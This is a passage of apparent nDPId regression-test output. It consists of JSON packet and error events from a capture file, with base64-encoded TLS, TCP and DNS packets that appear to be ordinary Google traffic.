layer","datalink":12,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797442} 
-00619{"packet_event_id":1,"packet_event_name":"packet","packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":271,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":271,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABDwMWQABABsiCwKi0AkDpuLyAsgG7QZiF2aTu9RqAGADlVfIAAAEBCAoANYbUHkOFlBYDAQDWAQAA0gMD4HuK+eOlMdUOH1cZsMt60He+NukWbTB7f1JNaYrt+NsAACjAK8AswC\/AMACeAJ\/ACcAKwBPAFAAzADnAB8ARAJwAnQAvADUABQD\/AQAAgQAAABUAEwAAEG10YWxrLmdvb2dsZS5jb20ACwAEAwABAgAKADQAMgAOAA0AGQALAAwAGAAJAAoAFgAXAAgABgAHABQAFQAEAAUAEgATAAEAAgADAA8AEAARACMAAAANACAAHgYBBgIGAwUBBQIFAwQBBAIEAwMBAwIDAwIBAgICAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":244,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797505} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":244,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMXQABABslcwKi0AkDpuLyAsgG7QZiGtKTu+oaAEAES8esAAAEBCAoANYbaHkOF7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":245,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797508} -00325{"packet_event_id":1,"packet_event_name":"packet","packet_id":245,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMYQABABslbwKi0AkDpuLyAsgG7QZiGtKTu\/\/KAEAE\/7FEAAAEBCAoANYbbHkOF7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":246,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797508} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":246,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMZQABABslawKi0AkDpuLyAsgG7QZiGtKTvBHiAEAFq56AAAAEBCAoANYbbHkOF7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":247,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797556} -00493{"packet_event_id":1,"packet_event_name":"packet","packet_id":247,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":178,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":178,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAsgMaQABABsjbwKi0AkDpuLyAsgG7QZiGtKTvBHiAGAFqNYcAAAEBCAoANYbgHkOF7BYDAwBGEAAAQkEEygA0cs5oyBQUPZsJWy3f3szO8eg6l5VS2eGtEbXrhuValhaBoFT5VOyPsBGiM5YcAWBvsKH5wssaiUW5asI4uBQDAwABARYDAwAo\/EiJwPKZA3acP9qn2s6P7AQ++VRJWrM7uU+CT68BE23E8ejpTzHCVQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":248,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797588} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":248,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMbQABABslYwKi0AkDpuLyAsgG7QZiHMqTvBW6AEAGW5YgAAAEBCAoANYbjHkOGXA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":249,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797654} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":249,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF3QABABoFywKi0ArL40DbC2QBQ64tGkd7pir+AEA\/rOocAAAEBCAoANYbpRwYHXA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":250,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797663} -01995{"packet_event_id":1,"packet_event_name":"packet","packet_id":250,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1287,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1287,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFBwMcQABABsSEwKi0AkDpuLyAsgG7QZiHMqTvBW6AGAGWC7UAAAEBCAoANYbpHkOGXBcDAwTO\/EiJwPKZA3dbY0bV48S\/8B+KPvXL6uHh8kwl68mglGPqUWQnS4ihswpXATa8xJs\/ErW4nATOodFQc2kKQTe82p7q8M25Y78EiEAyNMu7a4TsqepNtN5bTMVOUb8eYTCoMwc0HhXDsONiQtsPkEmJLyVlNDdyGpzwllU2aHiA3ZE8crgaX5DhVoEkLfWDFzwJLEdgiPsYt4BU2VizvfXBVo1rO8rucKHXrbWqPJL0WvbPOotCeVKrcHrqwpgVFM0eOlACpjbfEa6SZ673IzbfFzdYjeNSZdVAoj4kdBndlcaacuv0ybNrK3LTQmB405aTCvX\/7nlJdSHnScG3EVcFpiF42wgNvlbyoePdcMUFB4H5tgoPqHTo+6tZhw+qYDxWxXvJ9Gbgds3nnFFYsus0KHTRs+a4AqMbveo9YFAll\/tf1zWUN4xHIneGiOU6dHp+5\/Fv1mVx3jlCaArl\/\/DTItJQ3jjakFkAkKSmNZ3tN2ANoEmbocMeWszErAiCOQmLLlvMqho1AKw8oLycKNWGTBztEJZz9DteorI87q\/yKn9jwUXFrXdy+UbYNK5QZLroVPukIPR1tk0UypCZavxid2MKMTKOc+5UOBfCrFMwwOKAzhrusBHWjfJouOmbOyfWvJkDzneqnHKPsfUE2IY0p6UQKZ5uGNpsJvkrNU1OdBE8rm3FwktsYIOC\/yYXhdyo6HPwvuEmqsMOnwg\/bWu9baKbXudCIT423Ss3ZaGwsl5s1mqY5t2JfMWUsQlgN1yC9bZOxAegToXNcE80Qfq7LBqrty7lLOI6kHxV24mgYLEJFr44TdzYSLqLfPND7iwN+WT34VEmpq0K\/DFYSVPp\/bXCExATfKgkwA72ga9r4lJ\/nkN8LmScz4gbNtFoR5LusN\/E\/GsX6FZpzdvzPuwu77xdagp+t3VZ7cc1JxbbdslPYWiqdiTbQHg+LsMKLJwqNcBHfRuOTeG8tH47ouivwyCEd5IqYzV3TIV9X1K8sxLJY9NZfFjHcbZfKZVVDyJPosWTzP98lU7KKRiu1yCbq1Ayavj2v\/0incz4PN+Py5U3yn9gdWSLh2G4kij2l0yKfji9W98jLy8ggZXtD2+bX5hMuFZ2eBGTr1DaTk7TI3vIktIqF3YWYr4M
MG9GlusIV4id\/Liwj6N7Q2v5PfD3ucO1vaQ\/Bzb2L3uyuSveRcdCDgc32xr5L0y\/dATFRVhufkMatmgfNjxzODgOauV3Rh9PgpNL\/iCKDZWcalPKHi9DiOUL4QHAQDSSOcsUhbCuazYY1Tk+tA1KMSEKU4YmfjaulSnrk4WWu1\/bD7tYPeLcKfAJx\/LFpwvlfXxKhTfzbBF+en0Nb9ieek1uPIqnIfbLf1f10WdUZTWo5sq+s6a6enxuz+sYOR2IAeLXE7IG8r0iWygASktfkkI1B1LC40WXjp+FsTdp2T2prbawvOVeTSpEuf2cat\/Nl+ijW\/JuwZmdiS5vJVlEY68oxGFYGUcrT9iaDsNjTBEwU7MGwoyJvbitWc0nrtPVOKPCFa0QXY8nxtWVYMJLm071UWJDl71WQ6MpxLJvhZyqO4FQC9rGoAHMZtDxUhb5cMYFaUF5oP06UAg4ci8viATb0OkRGrkpJP5VyA9qkbIVVPhR"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":251,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797688} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":251,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF4QABABoFlwKi0ArL40DbC2QBQ64tGkd7pir+wEA\/rINUAAAEBCAoANYbtRwYHXAEBBQre6ZAr3umVlw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":252,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797690} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":252,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF5QABABoFkwKi0ArL40DbC2QBQ64tGkd7pir+wEA\/rG2kAAAEBCAoANYbtRwYHXAEBBQre6ZAr3umbAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":253,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797725} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":253,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMdQABABslWwKi0AkDpuLyAsgG7QZiMBaTvBYyAEAGW4BQAAAEBCAoANYbxHkOG0Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":254,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797743} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":254,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF6QABABoFvwKi0ArL40DbC2QBQ64tGkd7pmwOAEBAYKfsAAAEBCAoANYbyRwYHbg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":255,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797744} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":255,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF7QABABoFiwKi0ArL40DbC2QBQ64tGkd7pmwOwEBAYBXUAAAEBCAoANYbyRwYHbgEBBQre6ZWX3umbAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":256,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797744} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":256,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF8QABABoFtwKi0ArL40DbC2QBQ64tGkd7poG+AEBBFJGIAAAEBCAoANYbyRwYHbg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":257,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797745} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":257,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMeQABABslVwKi0AkDpuLyAsgG7QZiMBaTvBf2AEAGW348AAAEBCAoANYbyHkOG5A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":258,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797750} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":258,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF9QABABoFswKi0ArL40DbC2QBQ64tGkd7ppduAEBBzHscAAAEBCAoANYbzRwYHbg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":259,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797774} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":259,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMfQABABslUwKi0AkDpuLyAsgG7QZiMBaTvBnqAEAGW3wwAAAEBCAoANYb1HkOG5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":260,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797807} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":260,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF+QABABoFrwKi0ArL40DbC2QBQ64tGkd7pq0eAEBCgGR0AAAEBCAoANYb5RwYHeQ=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":261,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797808} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":261,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF\/QABABoFqwKi0ArL40DbC2QBQ64tGkd7psLOAEBDNE4MAAAEBCAoANYb5RwYHeg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":262,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797809} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":262,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGAQABABoFpwKi0ArL40DbC2QBQ64tGkd7pth+AEBD6DekAAAEBCAoANYb5RwYHew=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":263,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797875} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":263,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGBQABABoFowKi0ArL40DbC2QBQ64tGkd7pu4uAEBEoCDsAAAEBCAoANYb\/RwYHiQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":264,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797888} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":264,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGCQABABoFnwKi0ArL40DbC2QBQ64tGkd7pwPeAEBFVAp8AAAEBCAoANYcBRwYHig=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":265,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797948} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":265,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGDQABABoFawKi0ArL40DbC2QBQ64tGkd7pwPewEBFVfHoAAAEBCAoANYcHRwYHigEBBQre6cZj3unLzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":266,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797948} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":266,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGEQABABoFZwKi0ArL40DbC2QBQ64tGkd7pwPewEBFVdw4AAAEBCAoANYcHRwYHigEBBQre6cZj3unROw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":267,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798019} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":267,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGFQABABoFQwKi0ArL40DbC2QBQ64tGkd7pwPfQEBFV248AAAEBCAoANYcORwYHigEBBRLe6dwT3unhf97pxmPe6dE7"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":268,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798085} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":268,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGGQABABoFXwKi0ArL40DbC2QBQ64tGkd7p0TuwEBGCQGcAAAEBCAoANYcVRwYHvgEBBQre6dwT3unhfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798230} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":65,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":65,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQYcjQABAES7OwKi0AggICAguEQA1AC1oEnazAQAAAQAAAAAAAARwbGF5Cmdvb2dsZWFwaXMDY29tAAABAAE="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798305} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPHAIQABABm7AwKi0AkDppl+6uwG7gNP3IgAAAACgAjkI9zgAAAIEBbQEAggKADWHKgAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":271,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798386} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":271,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANHAJQABABm7HwKi0AkDppl+6uwG7gNP3IxI082eAEADlT7wAAAEBCAoANYczAMsH6w=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798392} -00571{"packet_event_id":1,"packet_event_name":"packet","packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":236,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":236,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAA7HAKQABABm4OwKi0AkDppl+6uwG7gNP3IxI082eAGADln0MAAAEBCAoANYczAMsH6xYDAQCzAQAArwMBVmhd\/avXwE9Hbo+g4bJoaBoe\/PaQpNdc4O0Q8a7HcbYAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":273,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798478} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":273,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQHALQABABm65wKi0AkDppl+6uwG7gNP32xI082ewEADl\/WcAAAEBCAoANYc8AMsH6wEBBQoSNPjTEjT+Pw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":274,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798479} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":274,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQHAMQABABm64wKi0AkDppl+6uwG7gNP32xI082ewEADl+h8AAAEBCAoANYc8AMsH6wEBBQoSNPjTEjUBhw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":275,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798557} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":275,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANHANQABABm7DwKi0AkDppl+6uwG7gNP32xI1AYeAEAESP+YAAAEBCAoANYdEAMsIqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":276,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798615} -00501{"packet_event_id":1,"packet_event_name":"packet","packet_id":276,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAunAOQABABm48wKi0AkDppl+6uwG7gNP32xI1AYeAGAESyy0AAAEBCAoANYdKAMsIqxYDAQBGEAAAQkEERW4InoLmmETsmbq7iNYq\/uNoJjfYZ7GrVbCgL+pMTKvYUbYVc42GhfBm5bJZLifeIScwh0Es60NTSZBLNuKx6hQDAQABARYDAQAwP+gkOxQQZv5+tK2pbv10GSaJPvtkOm9t6GPFVbw4WeGoA4IHJkkluw15ri+Pcw3x"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":277,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798665} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":277,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANHAPQABABm7BwKi0AkDppl+6uwG7gNP4YRI1AcKAEAESPqMAAAEBCAoANYdOAMsJIw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":278,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798683} 
-01137{"packet_event_id":1,"packet_event_name":"packet","packet_id":278,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":649,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":649,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACiXAQQABABmxrwKi0AkDppl+6uwG7gNP4YRI1AcKAGAESmlcAAAEBCAoANYdQAMsJIxcDAQJQtYB8KceZcX537qxqxSeHK6h3g94pz350VSgCUaq6kyHRu\/ujOAK44PaoYsIkwvMkPdw\/SInfY\/vx8JrDAidotcWdlNsEJMy9dXo9pMd40Jqbtwq\/LtEfd5PwCyCX2bP+OOBO290j\/3SVrGprv7t+gW4fg1nyKr4WbHMTVahOqWzzDiROFa40b1rNESXI3kDBrleOyVynSWiz9BRu8jM6grVD6EPM9FIVJCaDld4xb2XlNWkdt2tX\/7nYXXrC5bAv1eb\/rBJYwaFY2uf9A0C9+BsIZy4x9XIYr2bwiGw65DWYo+LwdqMH0DXtHhhbrMC80GWY153ZH\/bULV\/hjuOc3lTzjKsSgRMRUqMWCe1ob+dCeLIbhuNO2bICDSK8uoTc53tYtgvn46iMKP1Xgra\/14uoiuHF\/0pKyfwTDYU02kpKOTVYhNy4pYMUMpAR0FK1V1nHL0BrmjJSGytBkPo\/gBON5OC\/Ewt4MOze3uiZf1vqR8ncqxLr6pyPcTO6Hqb9VZxwjtesZRXZUZ+YnE\/LD4MuUjxcckBDmCjSHFM12kx0FN\/lj++BDCdMHTo+2gxh3p3gxdgptwCv5ybFi3t0KGt0wt3eB9jHTbWDvoiVCFposaKUpqKXMqXJe5otBMMJKXCnuabbnJEQOVdtTlsedvkpqA39eVzMfSZ2x4wd45NFW0LmK1iivY3N2ujwGCBXNYs4C\/9+CQGKUpZUdBB\/PjSNu5EwrqhBnb785VOxOuhIe8hU1ynbqL7reEoA9ZJC62UmMRLT8TL9GJPJYtDIEA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":279,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798795} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":279,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANHARQABABm6\/wKi0AkDppl+6uwG7gNP6thI1A7eAEAE9OdwAAAEBCAoANYdcAMsJZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":280,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798803} 
-00372{"packet_event_id":1,"packet_event_name":"packet","packet_id":280,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAWXASQABABm6ZwKi0AkDppl+6uwG7gNP6thI1A7eAGAE9JTsAAAEBCAoANYdcAMsJZxUDAQAgq\/9CYFvXrcQVyGdxSYtUugliMMXMg2CdqVJvhJ\/MPXc="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":281,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798887} 